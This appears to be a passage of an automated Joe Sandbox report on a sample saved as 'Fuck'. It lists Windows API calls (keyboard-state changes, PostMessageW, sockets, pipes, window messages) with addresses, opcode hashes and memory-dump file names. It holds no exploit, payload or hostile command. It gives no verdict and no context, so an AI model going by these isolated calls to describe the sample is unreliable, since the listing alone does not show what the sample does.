                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4072528602-0
                                                                                                                                                                                                                                      • Opcode ID: d0ce32c49479b9fda9382a27d6ae7ab2d32786433541a9046a3336f6178eee8f
                                                                                                                                                                                                                                      • Instruction ID: b3bd23fcaf0b4b6e3a1e025c3c7c3e81a399540d3075fecd8778ffb091fd4111
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0ce32c49479b9fda9382a27d6ae7ab2d32786433541a9046a3336f6178eee8f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D771E23460024CEFEB25AF65C984FFA7BB5EF49344F60505AEA56B7291CB31AC40DB10
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00ECB5AF
                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00ECB5C4
                                                                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 00ECB625
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00ECB653
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00ECB672
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00ECB6B3
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00ECB6D6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 87235514-0
                                                                                                                                                                                                                                      • Opcode ID: 5762d27fc53d3264fe97cef58dd0fc14a39923b8790c1df6fbf81e54a9b661bd
                                                                                                                                                                                                                                      • Instruction ID: e790e4be454823ca77b956ae7711f04baf107ca79175045ef13af77ba45f6193
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5762d27fc53d3264fe97cef58dd0fc14a39923b8790c1df6fbf81e54a9b661bd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1451E1A09087D53DFB364234CD0AFBA7EA95B02308F08958DE1D5668C2C7DAEC9AD751
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetParent.USER32(00000000), ref: 00ECB3CF
                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00ECB3E4
                                                                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 00ECB445
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00ECB471
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00ECB48E
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00ECB4CD
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00ECB4EE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 87235514-0
                                                                                                                                                                                                                                      • Opcode ID: b52e192f856cf1c210ff87ea2400b6473f0a9b7f233224a6fd70015189ff04e1
                                                                                                                                                                                                                                      • Instruction ID: 6b6a384ece9cf81b2db64be9a4e1c0f3e582203e9492144b46f7ce2653ab328d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b52e192f856cf1c210ff87ea2400b6473f0a9b7f233224a6fd70015189ff04e1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 545118A05487D53DFB3683348D46FBA7E996F01304F08948DE1E5664C3D396EC8AD750
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetConsoleCP.KERNEL32(00EA4486,?,?,?,?,?,?,?,?,00E95E23,?,?,00EA4486,?,?), ref: 00E956F0
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00EA4486,00000005,00000000,00000000), ref: 00E957AC
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,00EA4486,00000000,#^,00000000,?,?,?,?,?,?,?,?,?,00E95E23,?), ref: 00E957CB
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,#^,00000000,?,?,?,?,?,?,?,?,?,00E95E23,?), ref: 00E95804
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                      • String ID: #^
                                                                                                                                                                                                                                      • API String ID: 977765425-530722947
                                                                                                                                                                                                                                      • Opcode ID: dca0316c0bd647c339deed9cd611b5291d6d3496622c01c466eded21c48201f5
                                                                                                                                                                                                                                      • Instruction ID: 90ee33a632d2a3b3542231528746261e1a917c823f11f23216414faed7e936ae
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dca0316c0bd647c339deed9cd611b5291d6d3496622c01c466eded21c48201f5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6551BF71A006099FCF25CFA8DC85AEEBBF9EF49300F14512AE955F7291D730AA40CB61
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00EF418A
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00EF419F
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00EF41B9
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00EF422B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00EF4259
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Window
                                                                                                                                                                                                                                      • String ID: SysListView32
                                                                                                                                                                                                                                      • API String ID: 2326795674-78025650
                                                                                                                                                                                                                                      • Opcode ID: 2c9b39aae13efe1de88cc68a236042bf433cd45925d6418cbe0a8107820e84d9
                                                                                                                                                                                                                                      • Instruction ID: 7b662ff08c268902507d67c82c77a42662e6db6f258c2ec77a12df41b2ca2d2b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c9b39aae13efe1de88cc68a236042bf433cd45925d6418cbe0a8107820e84d9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA418FB1A0021DABEB119FA4CC49BFB7BA9EB58354F101526FA58F72D1D7709980CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EE38A7: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00EE38D3
                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00EE196B
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00EE197A
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00EE1A22
                                                                                                                                                                                                                                      • closesocket.WSOCK32(00000000), ref: 00EE1A52
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$closesocketinet_addrsocket
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3854663608-0
                                                                                                                                                                                                                                      • Opcode ID: a766c0e07b6190f3b5bd12f64c5b21b6dc46544b1c52e1dc959170cf4e0cba74
                                                                                                                                                                                                                                      • Instruction ID: 7e65a6436786fd8fbe4b71a4846de515c6afd2234fd7fe76ad58fa6215268ba7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a766c0e07b6190f3b5bd12f64c5b21b6dc46544b1c52e1dc959170cf4e0cba74
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E411731600148AFDB109F56CC44BB97BEAEF84358F1480A9F845BB282D771ED84CBE1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00EF3681
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EF36B4
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EF36E9
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00EF371B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00EF3745
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EF3756
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EF3770
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2178440468-0
                                                                                                                                                                                                                                      • Opcode ID: 14fbd2042bead752dbd31f0f672ab43170de157b720b80935885f5735adf2b4f
                                                                                                                                                                                                                                      • Instruction ID: f0112726512e8f7d39e9ce9500d2eabaca63f86e026d99415d201920ca936c8c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14fbd2042bead752dbd31f0f672ab43170de157b720b80935885f5735adf2b4f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3313974205248EFDB21DF29DC84F6537E2EB8A364F162165F610EF2B1CB71A940EB01
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EC7E07
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EC7E2D
                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00EC7E30
                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00EC7E4E
                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00EC7E57
                                                                                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00EC7E7C
                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00EC7E8A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3761583154-0
                                                                                                                                                                                                                                      • Opcode ID: 08a8316591e4450aec829fcb982792757efc2a5d3a99923f4eea08f329242436
                                                                                                                                                                                                                                      • Instruction ID: 2233448f7543ed315255ecfbe37537c6bbace532e489fb56e6b9bc185eab5568
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08a8316591e4450aec829fcb982792757efc2a5d3a99923f4eea08f329242436
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0219537608219AF9F10EFA9CC84DFB77ADEB09364B048429F955EB190D670EC46CB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EC7EE0
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EC7F06
                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00EC7F09
                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32 ref: 00EC7F2A
                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32 ref: 00EC7F33
                                                                                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00EC7F4D
                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00EC7F5B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3761583154-0
                                                                                                                                                                                                                                      • Opcode ID: 3bad640994370e0227619861748e2513e180407387c0f535a79a19e59c3d4c0d
                                                                                                                                                                                                                                      • Instruction ID: 76ca1778a43e07add59caf94f5053a17da3d7eefe3d5ff5eba8291829d44b7cb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3bad640994370e0227619861748e2513e180407387c0f535a79a19e59c3d4c0d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43219D757082046FDB109FA9DCC4DBA77EDEF493647008129F955EB2A0D670DC46CB64
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00ED0CA4
                                                                                                                                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00ED0CE0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateHandlePipe
                                                                                                                                                                                                                                      • String ID: nul
                                                                                                                                                                                                                                      • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                      • Opcode ID: ebafb1fd0535cf92c8fa0f73d772411cdcad25898517ba850a9624c5efb83633
                                                                                                                                                                                                                                      • Instruction ID: ed2d65a9e335688fa9c2b0dfb47e70f913db2822bc18636352d665d3a709c0a8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ebafb1fd0535cf92c8fa0f73d772411cdcad25898517ba850a9624c5efb83633
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9216B70500305AFDB209F65DC08B9A7BA5EF81728F284A1AE8A1E72E0D770E942DB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00ED0D78
                                                                                                                                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00ED0DB3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateHandlePipe
                                                                                                                                                                                                                                      • String ID: nul
                                                                                                                                                                                                                                      • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                      • Opcode ID: 89564df98f3e575c4174a619dffa3aefe85189a74fb9cb46336f8bf46c7211b8
                                                                                                                                                                                                                                      • Instruction ID: 4172f51c85d91b5527b5aedf514ad9cacbd036c3c9bbc68c980a76771808437d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89564df98f3e575c4174a619dffa3aefe85189a74fb9cb46336f8bf46c7211b8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE219F715043069FDB209F799D04BAA7BA8EF55728F281A1AECA1F73D0D7709942CB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E66653: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E66691
                                                                                                                                                                                                                                        • Part of subcall function 00E66653: GetStockObject.GDI32(00000011), ref: 00E666A5
                                                                                                                                                                                                                                        • Part of subcall function 00E66653: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E666AF
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00EF4979
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00EF4986
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00EF4991
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00EF49A0
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00EF49AC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                      • String ID: Msctls_Progress32
                                                                                                                                                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                      • Opcode ID: c81903492d01812d2e89f2acc035b20d464228f1b097a56adf8a0b3dc80d9986
                                                                                                                                                                                                                                      • Instruction ID: 03c77d2c8dc31a33c507cc846260a429f2310f0aede1a2b68dcd7c98b1f03e9d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c81903492d01812d2e89f2acc035b20d464228f1b097a56adf8a0b3dc80d9986
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C1163B215011EBEEF115F64DC86EEB7F9DEF48798F015111BB18A6090C6719C219BA4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
